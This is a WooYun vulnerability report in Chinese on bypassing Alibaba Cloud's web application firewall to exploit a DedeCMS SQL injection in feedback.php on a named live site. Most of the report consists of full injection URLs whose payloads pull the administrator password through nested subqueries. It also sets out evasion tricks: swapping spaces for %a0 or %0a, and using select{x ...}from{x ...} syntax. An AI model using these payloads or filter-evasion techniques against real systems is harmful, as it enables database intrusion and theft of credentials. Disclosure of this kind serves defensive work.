WooYun.org

使用这个dede的注入进行测试
First bypass:
首先访问：http://www.fywealth.cn/plus/feedback.php?validate=SEYY&action=send&comtype=comments&fid=1&isconfirm=yes&msg=90sec&typeid=0','3','4','5','0','1351739660', '0','0','0','0','0','aaaaaa'),('1544','2',@`'`,'4','5','1','1351739660', '0','0','0','0','0',uptade(select( union select passwordxxxxxfromxxxxadmin limit 1)))%23
看到被拦截了，说明阿里云waf对union select 已经不是像之前那样只考虑单词边界问题了。
所以我们之恩能够放弃union进行注入的方式。
而在insert update这样的注入是不需要union的，所以我们来测试一下这样注入。
访问此url：http://www.fywealth.cn/plus/feedback.php?validate=SEYY&action=send&comtype=comments&fid=1&isconfirm=yes&msg=90sec&typeid=0','3','4','5','0','1351739660', '0','0','0','0','0','aaaaaa'),('1544','2',@`'`,'4','5','1','1351739660', '0','0','0','0','0',(select(select passwordxxxxfromxxxadmin limit 1)))%23
看到成功发出去了，说明这样的语句只是对单词边界的检测，这样就增加了我们绕过的几率。
我们再访问此url(用%a0来填充空格，前面加update来确认语句是否发送到客户端)：http://www.fywealth.cn/plus/feedback.php?validate=SEYY&action=send&comtype=comments&fid=1&isconfirm=yes&msg=90sec&typeid=0','3','4','5','0','1351739660', '0','0','0','0','0','aaaaaa'),('1544','2',@`'`,'4','5','1','1351739660', '0','0','0','0','0',(select(select password from%a0admin limit 1)))%23
可以看到成功bypass了

Second bypass:
测试上一次的： WooYun: 阿里巴巴云盾防御策略可以bypass（实例证明）
对于这样的(select(select{x pwd}from{x %23@__admin}+limit+1)注入语句确实修复了。
但是fuzz的时候发现这样一个问题：select{x pwd}from{x %23@__admin}语句中，如果去掉空格也就bypass了
比如这样select{pwd}from{admin}就不会拦截，猜测是否增加了一个规则专用来对抗这样语句?像select{xx xxx}from{xxx xxx}这样就拦截，但是对于含有空格检测的正则中有多种bypass方式
例如：select{x%a0comment}from{x%a0guestbook}limit 1这样也是可以查出数据的
访问：http://www.fywealth.cn/plus/feedback.php?validate=SEYY&action=send&comtype=comments&fid=1&isconfirm=yes&msg=90sec&typeid=0','3','4','5','0','1351739660', '0','0','0','0','0','aaaaaa'),('1534','2',@`'`,'4','5','1','1351739660', '0','0','0','0','0','x' update(select(select{x%0acomment}from{x%0aguestbook}limit 1))%23
也成功bypass

本地测试这样的语句：select{x%0acomment}from{x%0aguestbook}limit 1
成功执行了，也影响了数据，